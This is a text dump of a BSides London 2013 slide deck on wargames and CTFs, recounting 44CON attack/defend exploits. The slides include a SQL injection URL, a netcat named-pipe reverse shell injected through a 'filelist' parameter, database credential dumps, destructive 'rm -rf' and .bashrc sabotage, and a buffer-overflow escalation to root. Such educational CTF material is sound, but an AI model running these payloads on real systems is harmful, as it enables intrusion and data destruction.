SlideShare une entreprise Scribd logo

Playing CTFs for Fun & Profit

I
impdefined

Presented at BSides London 2013

Technologie
1  sur  119
Playing CTFs for Fun & Profit
Me @impdefined Software developer Know a lot about bugs Trying not to make things worse
Me Playing CTFs for ~2 years CTF team 0xbadf00d Contributor to io.smashthestack.org
You
Wargames & CTFs
Wargames & CTFs – Why? Learning Hands-on experience Legal Fun! (and profit)
Wargames & CTFs – Why?
Wargames
Wargames
Wargames Technical security exercises
Wargames Technical security exercises Hacking challenges
Wargames Technical security exercises Hacking challenges Progress through series of levels No time limits Solo
Wargames - categories Web Binary exploitation Cryptography General design flaws
Wargames - examples
Loaded 1 password hash (FreeBSD MD5 [32/32]) ******* (administrator) guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ********
Wargames - experience
Playing wargames I got to: Implement a padding oracle attack against RSA Despair at the state of PHP Implement a CPU timing attack Exploit a kernel stack buffer overflow Create a JS VM for a custom processor architecture Write lots of custom shellcode XOR all the things
Capture the Flag
Capture the Flag Time-limited event to test your skills Team-based Competitive Not “progressive”
CTF types Challenge-based DEF CON quals Ghost In The Shellcode CSAW CTF Attack/defend DEF CON finals 44Con CTF 2012
CTF types Lots of online events ~20 last year mainly challenge-based Live events! 44CON: Lewt RuCTFE: £3,000 Codegate: £11,000
Playing CTF
Capture the flag experience
Capture the flag experience
CTF challenge - jacked
CTF challenge - jacked # nc jacked.final2012.ghostintheshellcode.com 2121 Jack's Blackjack Simulator Blackjack pays 2:1 Dealer must hit soft 17 Single deck, shuffled after every round Enter your name: pwn Your table companions: Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950 You have $1000 Place your bet (zero to exit): $
CTF challenge - jacked $1,000,000,000 will win the game Good random source 32bit seed Player 1 is Tracy with $1332 Player 2 is Grace with $770 Player 3 is Curtis with $1376 Player 4 is Bryan with $1950
CTF challenge - jacked
CTF challenge - Folly Text adventure On winning, enter shellcode Binary is chrooted, make custom code Read “key” file... get another port and binary
CTF challenge - Folly x86_64 x86 ARM ARM Thumb PPC Alpha Cris
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
CTF challenge - blocky
44CON CTF 2012
44CON CTF 2012 Attack & Defend Provided with: Virtual machine IP address Ranges of target machines
Attack & Defend Kind of like a pentest but more fun I have a plan Recon Harden Write exploits Run riot Get the girl
Recon I'd rather be offline than owned Self-recon Capture traffic Quick nmap of non-player servers
Recon - services
Recon - services
Recon - scoring Packet captures shed some light Regular "scoring rounds“ Every 30 minutes Scoring server stores new keys in services and checks for previous keys
Pastie
Pastie
Pastie
Pastie
Pastie Written in PHP Pastes stored in a MySQL database PHP+MySQL Can you tell what the vuln is yet?
Pastie vulnerability Classic SQL injection
Pastie fix It’s not all pwnpwnpwn Updated code with prepared statements PHP 
Pastie exploit I want keys!
Pastie exploit https://ip/view/%'+and+lang+=+'text'+order+by+ date+desc+--+
Pastie exploit
Pastie exploit – scripted
Mailserver
Mailserver SMTP and POP3 server Keys stored in emails Written in Ruby I don’t know Ruby Only ~500 lines
Mailserver - vulnerability This just interprets provided text as ruby code Time to learn Ruby! ???
Mailserver - vulnerability Looking at the logs... Verify vulnerability
Mailserver - exploitation I'm sure Ruby is lovely... ... but let's just find some code to copy
Mailserver - exploitation
Mailserver - exploitation
Mailserver - scripted
Auth
Auth Listening on port 23500
Auth
Auth Redis wrapper Stores arbitrary strings
Auth vulnerability Source analysis 101
Auth vulnerability
Auth exploitation Classic stack buffer overflow Overwrite return address with any value Pre-auth remote code execution...
Auth exploitation Classic stack buffer overflow Overwrite return address with any value Pre-auth remote code execution... ... noooope.
Auth exploitation
Auth exploitation Put a valid writable address in the pointer Easy if this was a 32bit process 64bit, annoying memory space
Auth exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
Auth exploitation gdb$ info proc map Mapped address spaces: Start Addr End Addr Size Offset objfile 0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth 0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth 0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth 0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall](readonly)
Auth exploitation Time’s up! No remote code execution  Very limited DoS Crash process Restarts automatically
Servicemon
Servicemon
Servicemon
Servicemon
Servicemon Command injection via "filelist" parameter
Servicemon - vulnerability filelist=/services/auth/auth %x(shasum /services/auth/auth) filelist=notafile || id %x(shasum notafile || id)
Servicemon - vulnerability
Servicemon - exploitation Never mind keys, I want a shell contestant@ubuntu:~$ nc -l 31337 -e /bin/sh nc: invalid option -- 'e'
Servicemon - exploitation Stand back... I know bash* rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75 31337 >/tmp/f http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp %2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20% 2Ftmp%2Ff%7C%2Fbin%2Fsh%20- i%202>%261%7Cnc%20192.168.1.75%203133 7%20>%2Ftmp%2Ff * totally copied from somewhere
Servicemon - exploitation contestant@ubuntu:~$ nc -lv 31337 Connection from 192.168.1.72 port 31337 [tcp/*] accepted $ whoami contestant $ pwd /services/servicemon I got a shell! Now I can have some fun!
Rampage
Rampage
Steal all the keys mysql --user=sinatra --password=44ConCTF servicemon -e "select status from statuses order by created_at desc limit 1;" mysql --user=pastie --password=J@cobsClub$ paste -e "select pastie from pastie order by date desc limit 1;" OUTPUT=redis-cli -r 1 keys * | tail -n 1 redis-cli -r 1 lrange $OUTPUT 0 1
Leave a calling card echo 'Look behind you! A three-headed monkey!' > /services/pastie/.win
Annoy echo exit >> ~/.bashrc rm -rf /services echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc
Escalation
Escalation Getting keys is fine Getting shells is better Getting root is best
Escalation – the hard way $ find /etc -writable /etc/init/mail.conf /etc/init/auth.conf
Escalation – the hard way USER PID TTY STAT COMMAND root 8680 ? Ss /services/auth/auth
Escalation – the hard way When auth starts we will get a root shell Lame DoS to the rescue! perl -e 'print "auth " . "A"x1100 . "n"' | nc ip 23500 Connection from 192.168.1.73 port 31337 [tcp/*] accepted # whoami root
Escalation – the easy way 220 Mail Service ready (33147) HELO 250 Requested mail action okay, completed EXPN respond(client, %x(whoami)) root
Playing wargames & CTFs
Useful stuff – general Scripting language Hex editor Linux & Windows VMs The linux “file” command
Useful stuff - web Firefox + Firebug + Tamper data php.net
Useful stuff - binary C Disassembler (IDA demo, Hopper)
Useful stuff - CTF Collaboration! Hall.com sync.in Wiki IRC
Wargame recommendations overthewire.org (Natas) Web exploitation io.smasthestack.org Binary exploitation hackthissite.org Web exploitation overthewire.org (Vortex) Binary exploitation overthewire.org (Bandit) "Absolute beginners" (learn how to Linux)
CTF recommendations http://ctftime.org DEF CON CTF June Binary-heavy CSAW CTF “gentle” introduction September
Motivation 44CON Lewt CSAW £600 HitB AMS £1,500 Plaid £2,500 RuCTFE £3,000 PHdays £6,000 Codegate £11,000
Motivation
Questions @impdefined impdefined@0xbadf00d.co.uk

Recommandé

Caputre the flag
Caputre the flagCaputre the flag
Caputre the flagUIT
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingHeba Hamdy Farahat
 
Capture The Flag
Capture The FlagCapture The Flag
Capture The FlagHuu Tung Nguyen
 
Introduction of CTF and CGC
Introduction of CTF and CGCIntroduction of CTF and CGC
Introduction of CTF and CGCKir Chou
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Capture the flag
Capture the flagCapture the flag
Capture the flagKachkad Narender
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumerationVi Tính Hoàng Nam
 
A closer look at CTF challenges
A closer look at CTF challengesA closer look at CTF challenges
A closer look at CTF challengesDNIF
 

Recommandé

Caputre the flag
Caputre the flagCaputre the flag
Caputre the flagUIT
 
Play,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingPlay,Learn and Hack- CTF Training
Play,Learn and Hack- CTF TrainingHeba Hamdy Farahat
 
Capture The Flag
Capture The FlagCapture The Flag
Capture The FlagHuu Tung Nguyen
 
Introduction of CTF and CGC
Introduction of CTF and CGCIntroduction of CTF and CGC
Introduction of CTF and CGCKir Chou
 
Detection Rules Coverage
Detection Rules CoverageDetection Rules Coverage
Detection Rules CoverageSunny Neo
 
Capture the flag
Capture the flagCapture the flag
Capture the flagKachkad Narender
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumerationVi Tính Hoàng Nam
 
A closer look at CTF challenges
A closer look at CTF challengesA closer look at CTF challenges
A closer look at CTF challengesDNIF
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
La Sécurité informatiques
La Sécurité informatiquesLa Sécurité informatiques
La Sécurité informatiquesNouriddin BEN ZEKRI
 
Pare feu
Pare feuPare feu
Pare feuABDELKADER ABDOKABOUYA
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Christopher Korban
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERAErik Van Buggenhout
 
Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)LJ PROJECTS
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsDamien Magoni
 
Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConJorge Orchilles
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0Will Schroeder
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
Red team Engagement
Red team EngagementRed team Engagement
Red team EngagementIndranil Banerjee
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHaydn Johnson
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scannern|u - The Open Security Community
 
Alphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfslametarrokhim1
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat IntelligenceZaiffiEhsan
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat IntelligenceSirius
 
Playing 44CON CTF for fun and profit
Playing 44CON CTF for fun and profitPlaying 44CON CTF for fun and profit
Playing 44CON CTF for fun and profit44CON
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 

Contenu connexe

Tendances

How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsSergey Soldatov
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEJorge Orchilles
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Christopher Korban
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERAErik Van Buggenhout
 
Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)LJ PROJECTS
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security FundamentalsDamien Magoni
 
Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConJorge Orchilles
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniquesamiable_indian
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemRoss Wolf
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHaydn Johnson
 
Alphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfslametarrokhim1
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat IntelligenceZaiffiEhsan
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat IntelligenceSirius
 

Tendances (20)

How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSEAdversary Emulation and Red Team Exercises - EDUCAUSE
Adversary Emulation and Red Team Exercises - EDUCAUSE
 
La Sécurité informatiques
La Sécurité informatiquesLa Sécurité informatiques
La Sécurité informatiques
 
Pare feu
Pare feuPare feu
Pare feu
 
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
Alphorm.com Formation Hacking et Sécurité 2020 (1/3) : Méthodologies de Pente...
 
Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018Purple Teaming with ATT&CK - x33fcon 2018
Purple Teaming with ATT&CK - x33fcon 2018
 
Adversary Emulation using CALDERA
Adversary Emulation using CALDERAAdversary Emulation using CALDERA
Adversary Emulation using CALDERA
 
Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)Computer Security and Intrusion Detection(IDS/IPS)
Computer Security and Intrusion Detection(IDS/IPS)
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security Fundamentals
 
Purple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMConPurple Team Exercises - GRIMMCon
Purple Team Exercises - GRIMMCon
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Red team Engagement
Red team EngagementRed team Engagement
Red team Engagement
 
How to Plan Purple Team Exercises
How to Plan Purple Team ExercisesHow to Plan Purple Team Exercises
How to Plan Purple Team Exercises
 
NMAP - The Network Scanner
NMAP - The Network ScannerNMAP - The Network Scanner
NMAP - The Network Scanner
 
Alphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industrielsAlphorm.com Formation SCADA : Cybersécurité des systèmes industriels
Alphorm.com Formation SCADA : Cybersécurité des systèmes industriels
 
Understanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdfUnderstanding Cyber Attack - Cyber Kill Chain.pdf
Understanding Cyber Attack - Cyber Kill Chain.pdf
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence6 Steps for Operationalizing Threat Intelligence
6 Steps for Operationalizing Threat Intelligence
 

Similaire à Playing CTFs for Fun & Profit

Playing 44CON CTF for fun and profit
Playing 44CON CTF for fun and profitPlaying 44CON CTF for fun and profit
Playing 44CON CTF for fun and profit44CON
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - RoutersLogicaltrust pl
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Nate Lawson
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Poker, packets, pipes and Python
Poker, packets, pipes and PythonPoker, packets, pipes and Python
Poker, packets, pipes and PythonRoger Barnes
 
Defeating the entropy downgrade attack
Defeating the entropy downgrade attackDefeating the entropy downgrade attack
Defeating the entropy downgrade attackSeth Wahle
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful developmentConnor McDonald
 
Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Joe Arnold
 
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Andrew Case
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
The New Systems Performance
The New Systems PerformanceThe New Systems Performance
The New Systems PerformanceBrendan Gregg
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)Alexandre Moneger
 
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdfscribdsituation719
 
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...Amazon Web Services
 
Build Your Own Android Tablet
Build Your Own Android TabletBuild Your Own Android Tablet
Build Your Own Android TabletSGAndroidDevs
 

Similaire à Playing CTFs for Fun & Profit (20)

Playing 44CON CTF for fun and profit
Playing 44CON CTF for fun and profitPlaying 44CON CTF for fun and profit
Playing 44CON CTF for fun and profit
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routersFilip palian mateuszkocielski. simplest ownage human observed… routers
Filip palian mateuszkocielski. simplest ownage human observed… routers
 
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
Don't Tell Joanna the Virtualized Rootkit is Dead (Blackhat 2007)
 
Da APK al Golden Ticket
Da APK al Golden TicketDa APK al Golden Ticket
Da APK al Golden Ticket
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Poker, packets, pipes and Python
Poker, packets, pipes and PythonPoker, packets, pipes and Python
Poker, packets, pipes and Python
 
Defeating the entropy downgrade attack
Defeating the entropy downgrade attackDefeating the entropy downgrade attack
Defeating the entropy downgrade attack
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
Feb14 successful development
Feb14 successful developmentFeb14 successful development
Feb14 successful development
 
Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012Swift Install Workshop - OpenStack Conference Spring 2012
Swift Install Workshop - OpenStack Conference Spring 2012
 
amrapali builders@@sub way hacking.pdf
amrapali builders@@sub way hacking.pdfamrapali builders@@sub way hacking.pdf
amrapali builders@@sub way hacking.pdf
 
Hta w22
Hta w22Hta w22
Hta w22
 
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
Memory Forensics: Defeating Disk Encryption, Skilled Attackers, and Advanced ...
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
The New Systems Performance
The New Systems PerformanceThe New Systems Performance
The New Systems Performance
 
04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)04 - I love my OS, he protects me (sometimes, in specific circumstances)
04 - I love my OS, he protects me (sometimes, in specific circumstances)
 
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf0x01 - Breaking into Linux VMs for Fun and Profit.pdf
0x01 - Breaking into Linux VMs for Fun and Profit.pdf
 
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
AWS re:Invent 2016: Encryption: It Was the Best of Controls, It Was the Worst...
 
Build Your Own Android Tablet
Build Your Own Android TabletBuild Your Own Android Tablet
Build Your Own Android Tablet
 

Dernier

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
